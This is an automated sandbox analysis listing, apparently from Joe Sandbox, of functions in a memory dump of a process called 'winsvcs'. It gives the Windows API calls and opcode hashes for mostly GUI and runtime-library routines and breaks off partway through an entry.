Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: 020a3270b3e44db3070e349b28cff66a8442c1fddc848a019d4b1228e148b0af
Instruction ID: c2943d19c9542f00f785555977c3dc5d60b80e9ec805d4403e1c04b136c06cca
Opcode Fuzzy Hash: 020a3270b3e44db3070e349b28cff66a8442c1fddc848a019d4b1228e148b0af
Instruction Fuzzy Hash: 2C91D176B002258BCB14DF59F88076EB3B9EBC5314F95822AD815973A1E739EC01CBD8

Function 00418F70 Relevance: 9.1, APIs: 6, Instructions: 114stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,00000000,00000000,?), ref: 00418F91
lstrlenW.KERNEL32(?,00000000,80070057), ref: 00418FA9
_memcpy_s.LIBCMT ref: 00418FDB
_memcpy_s.LIBCMT ref: 00419018

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: _memcpy_slstrlen
String ID:
API String ID: 2392212498-0
Opcode ID: 69d6166470538bd476869948a087b28e718e2119ec8f685af8e8bd280e4ec471
Instruction ID: 48a8b0cc39821948161f5f9393556796c921f6ff3b7309816e02544d4b83d9d4
Opcode Fuzzy Hash: 69d6166470538bd476869948a087b28e718e2119ec8f685af8e8bd280e4ec471
Instruction Fuzzy Hash: 6B3106B16042119FE730AF22EC81A777BA8EB95314F14483EF98582211EA7AEC81C759

Function 00414E99 Relevance: 9.1, APIs: 6, Instructions: 89COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00414EF5
SelectObject.GDI32(00000000,00000000), ref: 00414F37
DeleteObject.GDI32(00000000), ref: 00414F45
FillRect.USER32(?,?,00000006), ref: 00414F63

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: ObjectRect$ClientDeleteFillSelect
String ID:
API String ID: 3522820569-0
Opcode ID: e1226587be8be15bcf8161aee864cef9789dc1afa6e9cc42e337da21b47d7f2b
Instruction ID: 865ed62e204f999886674634bdac8c5fb271fad3e2ed5c8a8075e854c35c8e72
Opcode Fuzzy Hash: e1226587be8be15bcf8161aee864cef9789dc1afa6e9cc42e337da21b47d7f2b
Instruction Fuzzy Hash: C43182762043029FD3109B28EC48BA7BBB9FFD4311F04552AF94986320DB76DC91CB65

Function 00411A09 Relevance: 9.1, APIs: 6, Instructions: 78threadCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0044B340), ref: 00411A19
GetCurrentThreadId.KERNEL32 ref: 00411A29
RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00411A4A
GetCurrentProcess.KERNEL32 ref: 00411A8E
FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00411A98
SetWindowLongA.USER32(?,00000004,?), ref: 00411AA5

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: CriticalCurrentSection$CacheEnterFlushInstructionLeaveLongProcessThreadWindow
String ID:
API String ID: 3823208529-0
Opcode ID: 07a1dbbba7aca397bf205b4bf3402bca78ea00ce08c76a63137ae00674a9b799
Instruction ID: 37a676f5cb27032d0318369953a16ba400cad8c49294232363eb4eb626f908f1
Opcode Fuzzy Hash: 07a1dbbba7aca397bf205b4bf3402bca78ea00ce08c76a63137ae00674a9b799
Instruction Fuzzy Hash: A821A132301310AFD7208FA5D8C4A27BFA4FF48714B08896AEA498B211C774EC41CB75

Function 00411F4C Relevance: 9.1, APIs: 6, Instructions: 78threadCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0044B340), ref: 00411F59
GetCurrentThreadId.KERNEL32 ref: 00411F69
RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00411F8A
GetCurrentProcess.KERNEL32 ref: 00411FCE
FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00411FD8
SetWindowLongA.USER32(?,000000FC,?), ref: 00411FE5

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: CriticalCurrentSection$CacheEnterFlushInstructionLeaveLongProcessThreadWindow
String ID:
API String ID: 3823208529-0
Opcode ID: bf9cfbff74908a5fb2d3181698138ae9454327fa4517f6e569a916d9ff9d2852
Instruction ID: 12e269af356ffb42e89dcecac3084760c7acb0868c2f02fce1b83a7edaf6f50e
Opcode Fuzzy Hash: bf9cfbff74908a5fb2d3181698138ae9454327fa4517f6e569a916d9ff9d2852
Instruction Fuzzy Hash: DA219232304310AFD7209FA5EDC4E27BBA4FB487147188A6AEE498B266C775DC41CB75

Function 004157E2 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?), ref: 00415827
ClientToScreen.USER32(?,?), ref: 00415839
GetParent.USER32(?), ref: 00415842
ScreenToClient.USER32(00000000), ref: 00415850
ScreenToClient.USER32(00000000,?), ref: 00415860
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00415884

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: ClientScreen$MoveParentWindow
String ID:
API String ID: 2420994850-0
Opcode ID: e708bffe7d4ed9b0d7b5ab86a1ff5b96d1dd09eb2dc1c1421c56ee2158abb95a
Instruction ID: cb2595f71ca4477885d93d82fefb541c649833f727a180719ed1214593514184
Opcode Fuzzy Hash: e708bffe7d4ed9b0d7b5ab86a1ff5b96d1dd09eb2dc1c1421c56ee2158abb95a
Instruction Fuzzy Hash: 0B214C72104202AFD701DF55DC84AABFBE8FF88350F04892DF98887260D771AC51CB65

Function 004290C5 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 004290ED

Part of subcall function 004257F4: __getptd.LIBCMT ref: 00425802
Part of subcall function 004257F4: __getptd.LIBCMT ref: 00425810

__getptd.LIBCMT ref: 004290F7

Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A

__getptd.LIBCMT ref: 00429105
__getptd.LIBCMT ref: 00429113
__getptd.LIBCMT ref: 0042911E
_CallCatchBlock2.LIBCMT ref: 00429144

Part of subcall function 00425899: __CallSettingFrame@12.LIBCMT ref: 004258E5

Part of subcall function 004291EB: __getptd.LIBCMT ref: 004291FA
Part of subcall function 004291EB: __getptd.LIBCMT ref: 00429208

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: e5377473d883af5e36911d90b7befaa7ab26b17d990b8ef33e783adc5ccc14be
Instruction ID: b999dcdba1427255f3dfb1c667b010caa462ff74c4b9d88451a5c342c024839a
Opcode Fuzzy Hash: e5377473d883af5e36911d90b7befaa7ab26b17d990b8ef33e783adc5ccc14be
Instruction Fuzzy Hash: 06111C71D00219DFDF00EFA5E945AAD7BB0FF04314F51806EF814A7251DB799A119F58

Function 00415189 Relevance: 7.7, APIs: 5, Instructions: 243COMMON

Download Yara Rule

APIs

SetLayeredWindowAttributes.USER32 ref: 0041525D

Part of subcall function 00423750: RtlInitializeCriticalSection.NTDLL(?), ref: 00423790

GetClientRect.USER32(?,?), ref: 0041541E
GetClientRect.USER32(?,?), ref: 0041542B
GetParent.USER32(?), ref: 00415454
CreateAcceleratorTableA.USER32(?,00000001), ref: 0041549D

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: ClientRect$AcceleratorAttributesCreateCriticalInitializeLayeredParentSectionTableWindow
String ID:
API String ID: 3375822417-0
Opcode ID: 45d69983561acb0787a1e87c84148cf3fe4b02d4f4df03dbabd8213c6035e985
Instruction ID: 6c39a8f56b411056154fd32cd0cf0432356b21fcc375bf42b615943a6af84bd3
Opcode Fuzzy Hash: 45d69983561acb0787a1e87c84148cf3fe4b02d4f4df03dbabd8213c6035e985
Instruction Fuzzy Hash: 45A10271605B01DFD750CF29C484B9ABBE0FF88714F148A6EE8899B351D7B5E881CB86

Function 00418DF0 Relevance: 7.6, APIs: 5, Instructions: 140stringCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(00000000), ref: 00418E1D
lstrlenW.KERNEL32(00000000), ref: 00418E26
_malloc.LIBCMT ref: 00418E87
WideCharToMultiByte.KERNEL32(00000003,00000000,00000000,000000FF,?,-00000002,00000000,00000000,80070057), ref: 00418EE8
RtlLeaveCriticalSection.NTDLL(00000000), ref: 00418F0D

Part of subcall function 0042592A: __lock.LIBCMT ref: 00425948
Part of subcall function 0042592A: ___sbh_find_block.LIBCMT ref: 00425953
Part of subcall function 0042592A: ___sbh_free_block.LIBCMT ref: 00425962
Part of subcall function 0042592A: HeapFree.KERNEL32(00000000,00000001,00442338,0000000C,00429C99,00000000,00442590,0000000C,00429CD3,00000001,004282ED,?,0042B2C2,00000004,00442610,0000000C), ref: 00425992
Part of subcall function 0042592A: GetLastError.KERNEL32(?,0042B2C2,00000004,00442610,0000000C,0042D625,00000001,004282FC,00000000,00000000,00000000,?,004282FC,00000001,00000214), ref: 004259A3

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: CriticalSection$ByteCharEnterErrorFreeHeapLastLeaveMultiWide___sbh_find_block___sbh_free_block__lock_malloclstrlen
String ID:
API String ID: 2649083834-0
Opcode ID: ef1b224d8926f9a9dfcc6db4d708e97175d39be32bb4f1fa101077006c2e8634
Instruction ID: ef69da5e920178eb1dcc70a03244176e842f214767484c64cd14ef8785300be5
Opcode Fuzzy Hash: ef1b224d8926f9a9dfcc6db4d708e97175d39be32bb4f1fa101077006c2e8634
Instruction Fuzzy Hash: 6E41E271B002159BDB048EA89C80BAB77669B94314F04827EFD18DB391DE78DD4587C9

Function 004100C0 Relevance: 7.6, APIs: 5, Instructions: 125COMMONLIBRARYCODE

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00410127
std::_String_base::_Xlen.LIBCPMT ref: 004100D5

Part of subcall function 00423A4B: __EH_prolog3.LIBCMT ref: 00423A52
Part of subcall function 00423A4B: std::bad_exception::bad_exception.LIBCMT ref: 00423A6F
Part of subcall function 00423A4B: __CxxThrowException@8.LIBCMT ref: 00423A7D

std::_String_base::_Xlen.LIBCPMT ref: 0041014F
_memmove_s.LIBCMT ref: 0041018C
_memmove_s.LIBCMT ref: 004101D7

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: String_base::_Xlen_memmove_sstd::_$Exception@8H_prolog3Throw_memcpy_sstd::bad_exception::bad_exception
String ID:
API String ID: 2104318304-0
Opcode ID: 0e18c90c5c1943eaeac10e3d21b7095421590bb7663952c0f9bed313bbdb744d
Instruction ID: 86bfcc1c74f1fc0be6eeef633fbe502bd8068da502ff08f6d6f7ea803161ce8a
Opcode Fuzzy Hash: 0e18c90c5c1943eaeac10e3d21b7095421590bb7663952c0f9bed313bbdb744d
Instruction Fuzzy Hash: 2A41F671604A0ABFD314DE19DA80966B3B6FB81300B50872AD42547A42D7B9FDD4C7E9

Function 00418CB0 Relevance: 7.6, APIs: 5, Instructions: 116COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0044E240), ref: 00418CC0
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00418528), ref: 00418D0E
RtlLeaveCriticalSection.NTDLL(0044E240), ref: 00418D52
RtlDeleteCriticalSection.NTDLL(0044E240), ref: 00418D65
RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00418528), ref: 00418DAB

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: CriticalSection$ExceptionRaise$DeleteEnterLeave
String ID:
API String ID: 2896116776-0
Opcode ID: 60206436312a941d5767896499db39d50c55b2d1c6d036ca9e5b6b81282be627
Instruction ID: 78883e933ddfd575a463b6ae8765c2241207876390ae6ac4d6d0b6bdd00743fe
Opcode Fuzzy Hash: 60206436312a941d5767896499db39d50c55b2d1c6d036ca9e5b6b81282be627
Instruction Fuzzy Hash: C241A7B26006149BEF50DF15FC85B5777A5EF50318F18C0AEE8098F246DB79E880CBA9

Function 00416E20 Relevance: 7.6, APIs: 5, Instructions: 108windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32(?,?,?,?,?,00415A10,?,?,?,00000001), ref: 00416F26

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: Focus
String ID:
API String ID: 2734777837-0
Opcode ID: 84ac6bd9c287139542d71f7be3785e708337f064b3dcd2006f309b01502409ea
Instruction ID: bf3b8484ead40ab7a99336afcf803f5614de82c4d018cbf0b84b9aed1ee85005
Opcode Fuzzy Hash: 84ac6bd9c287139542d71f7be3785e708337f064b3dcd2006f309b01502409ea
Instruction Fuzzy Hash: DF418F70208200AFDF049F64D888BA67BA9FF49304F1945A9FD49CA2A6D774DC45CF25

Function 00416D50 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32(?,?,?,?,?,004159B8,?,?,?,00000001), ref: 00416DD1
GetFocus.USER32 ref: 00416DD9
IsChild.USER32(?,00000000), ref: 00416DE3
GetWindow.USER32(?,00000005), ref: 00416DF2
SetFocus.USER32(00000000,?,?,?,?,004159B8,?,?,?,00000001), ref: 00416DF9

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: Focus$ChildWindow
String ID:
API String ID: 501040988-0
Opcode ID: c793180608d0979724f0a838961f09ecc627f66463751f4145e1aa4c09185380
Instruction ID: 8b2d6c618c82d252263e44c6a5238523959aa71bdc741b18c4e8e08c9a1a1d5c
Opcode Fuzzy Hash: c793180608d0979724f0a838961f09ecc627f66463751f4145e1aa4c09185380
Instruction Fuzzy Hash: C7215070204248AFDB209F64DC08BAA7BA9EF49315F15455DF8498A290DB74DD41CB65

Function 00423CD9 Relevance: 7.6, APIs: 5, Instructions: 68memorylibraryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,00423DAF,00000000,00411A70), ref: 00423CDB
LoadLibraryA.KERNEL32(0043AE1C,00000000,00000000,?), ref: 00423CF4
RtlAllocateHeap.NTDLL(00000000), ref: 00423D50
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00423D66
HeapFree.KERNEL32(00000000), ref: 00423D76

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: Heap$AllocateCompareExchangeFeatureFreeInterlockedLibraryLoadPresentProcessor
String ID:
API String ID: 354369530-0
Opcode ID: 8b5377b81b319b1867c463ea3525ab7744f2fc5701bdfb4c03f065609460afcb
Instruction ID: bad696d248039219c0635516f435c0c90e3ca1e931be28e5b90198828d8a9e0e
Opcode Fuzzy Hash: 8b5377b81b319b1867c463ea3525ab7744f2fc5701bdfb4c03f065609460afcb
Instruction Fuzzy Hash: C7116375750211AFEB209F76EC88A1737B9FB49742B54543AE501D3250D778DC01CB68

Function 00411E98 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

CallWindowProcA.USER32(?,?), ref: 00411EA9
GetWindowLongA.USER32(?,000000FC), ref: 00411EBD
CallWindowProcA.USER32(?,?,?,?,?), ref: 00411ED4
GetWindowLongA.USER32(?,000000FC), ref: 00411EEE
SetWindowLongA.USER32(?,000000FC,?), ref: 00411F02

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: Window$Long$CallProc
String ID:
API String ID: 513923721-0
Opcode ID: acdbc3f6024d0cc222a47a8be08bc14946d49dca3716f0fa29b8912c03d98ade
Instruction ID: f482abc3086895b13e65d7ed397f34a26d7f9aa96c4cf6a1d5cca4a790af85b8
Opcode Fuzzy Hash: acdbc3f6024d0cc222a47a8be08bc14946d49dca3716f0fa29b8912c03d98ade
Instruction Fuzzy Hash: 02212775508100EFCB008F18D984956BFB1FF98321B2486A6FD599A3BAC335DD52DB58

Function 0042BBDE Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0042BBEA

Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A

__amsg_exit.LIBCMT ref: 0042BC0A
__lock.LIBCMT ref: 0042BC1A
InterlockedDecrement.KERNEL32(?), ref: 0042BC37
InterlockedIncrement.KERNEL32(00449610), ref: 0042BC62

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: c7ae05eb49a4645ac65517e963bcd5d50b5c60d1e603a2dea6a3ff1ef9c62e76
Instruction ID: 52685b4dcb39849911ff3693f870a45c18f8edff1e4251c2b4a25b8dbaeea7ec
Opcode Fuzzy Hash: c7ae05eb49a4645ac65517e963bcd5d50b5c60d1e603a2dea6a3ff1ef9c62e76
Instruction Fuzzy Hash: CB01A532B00A31ABDA10AB66B80634A7360EB00720F86401FE810B3380CB28AC81DBDD

Function 0042592A Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00425948

Part of subcall function 00429CB8: __mtinitlocknum.LIBCMT ref: 00429CCE
Part of subcall function 00429CB8: __amsg_exit.LIBCMT ref: 00429CDA
Part of subcall function 00429CB8: RtlEnterCriticalSection.NTDLL(004282ED), ref: 00429CE2

___sbh_find_block.LIBCMT ref: 00425953
___sbh_free_block.LIBCMT ref: 00425962
HeapFree.KERNEL32(00000000,00000001,00442338,0000000C,00429C99,00000000,00442590,0000000C,00429CD3,00000001,004282ED,?,0042B2C2,00000004,00442610,0000000C), ref: 00425992
GetLastError.KERNEL32(?,0042B2C2,00000004,00442610,0000000C,0042D625,00000001,004282FC,00000000,00000000,00000000,?,004282FC,00000001,00000214), ref: 004259A3

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: a52d7784b9870ce3fb532fb8a395eec7211f746b9cf291a412798ea6c2133b02
Instruction ID: 784fe8f7d40001f7600859eb2be024fca0bf4e15d789c35dff29e27069072cfd
Opcode Fuzzy Hash: a52d7784b9870ce3fb532fb8a395eec7211f746b9cf291a412798ea6c2133b02
Instruction Fuzzy Hash: 0A014471B05622EAEF206B72BD0975E76A49F00735FE5411FF404661D1CA7C89818A5D

Function 0040F626 Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F637
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F64E
GetModuleHandleA.KERNEL32(00000000), ref: 0040F656
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F670
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F686

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 8f4c0706dec5b921881070b828bc059f98067ef9a44a745b39d12aca68c25be2
Instruction ID: a6e47eae5d4f7697fc9870831a46e4352dda564a31e996fcfd64f3f94e2429e5
Opcode Fuzzy Hash: 8f4c0706dec5b921881070b828bc059f98067ef9a44a745b39d12aca68c25be2
Instruction Fuzzy Hash: 64F037B4648300BFE3708B609C85FE777A9E784B01F109968F695966C0C6B458429B29

Function 0040F841 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F84B
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F85B
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F863
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F86F
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F87E

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: fe8ab35d2d4b76678f8eaa2d491c1a62432b4a2dd4fa43c40ff848aece5ca14c
Instruction ID: f30965056506db091dc390cd5668a26ed455dcdbe33213fe5701eb603ec7fe18
Opcode Fuzzy Hash: fe8ab35d2d4b76678f8eaa2d491c1a62432b4a2dd4fa43c40ff848aece5ca14c
Instruction Fuzzy Hash: 08E042B1289614BBF65117B06C4EFFA362DEB14B02F106420F792E91D0CAF86C428B7D

Function 0040F476 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F480
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F490
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F498
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F4A4
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F4B3

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 280e2ef3c34d406177bdd0737f02b4bdcc52c0b794340ad9b0d640b0685c45a8
Instruction ID: d2405f4d686cc329cb2c4974dd0d75fc30c27e1cdd077f1fd0386077d6bea2a0
Opcode Fuzzy Hash: 280e2ef3c34d406177bdd0737f02b4bdcc52c0b794340ad9b0d640b0685c45a8
Instruction Fuzzy Hash: D7E04C712996147AF65117B05C4EFFA352DAB15B01F105420F792E91D0CAF85C42477D

Function 0040F42E Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F438
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F448
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F450
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F45C
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F46B

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 0e316672f279bff40fc2bda2350cae290cb2c24a5f64e8ec2bbdc54f040f50ff
Instruction ID: aa7bb90587d74c23307c61ea89b22b129a7fc36b7eb487b4901722fb63985b8b
Opcode Fuzzy Hash: 0e316672f279bff40fc2bda2350cae290cb2c24a5f64e8ec2bbdc54f040f50ff
Instruction Fuzzy Hash: 38E04C712896147AF65117B05C4EFFA352DAB14B01F105420F792E91D1CAF86C42477D

Function 0040F8DD Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F8E7
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F8F7
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F8FF
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F90B
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F91A

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: c1ea1a87896c4083224ee37d4f0aa0f793a7ec889e4cfa23b51f65d89134a93f
Instruction ID: 490ac9be3a4df3e6166b8d436346df579d9a1bad408d84ec1039d8251566a421
Opcode Fuzzy Hash: c1ea1a87896c4083224ee37d4f0aa0f793a7ec889e4cfa23b51f65d89134a93f
Instruction Fuzzy Hash: 3FE042B1289614BAF65117B05C4EFFB362DEB14B02F106420F792E91D0CAF86C428B7D

Function 0040F889 Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F893
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F8A9
GetModuleHandleA.KERNEL32(00000000), ref: 0040F8B1
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F8BD
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F8D2

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

API ID: MessageSend$HandleIconLoadModule
String ID:
API String ID: 604839450-0
Opcode ID: 54e3c0c693e160c008cdc94d9783f1ee544556f92e7c07be2816797597bcd6c8
Instruction ID: 660c769eb77b366a8a23f818950a586be316288a064137e639420a7e0a5f472a
Opcode Fuzzy Hash: 54e3c0c693e160c008cdc94d9783f1ee544556f92e7c07be2816797597bcd6c8
Instruction Fuzzy Hash: 5FE0BF71288300BBF66117709C0EFEB362DE714B02F105420F796E51E0CAF55C419B2D

Function 0040F4BE Relevance: 7.5, APIs: 5, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040F4C8
SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0040F4D8
GetModuleHandleA.KERNEL32(00000000,?,00000080,00000001,00000000), ref: 0040F4E0
LoadIconA.USER32(00000000,0043ABC0), ref: 0040F4EC
SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0040F4FB

Memory Dump Source

Source File: 00000006.00000002.4801977157.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40b000_winsvcs.jbxd

Similarity

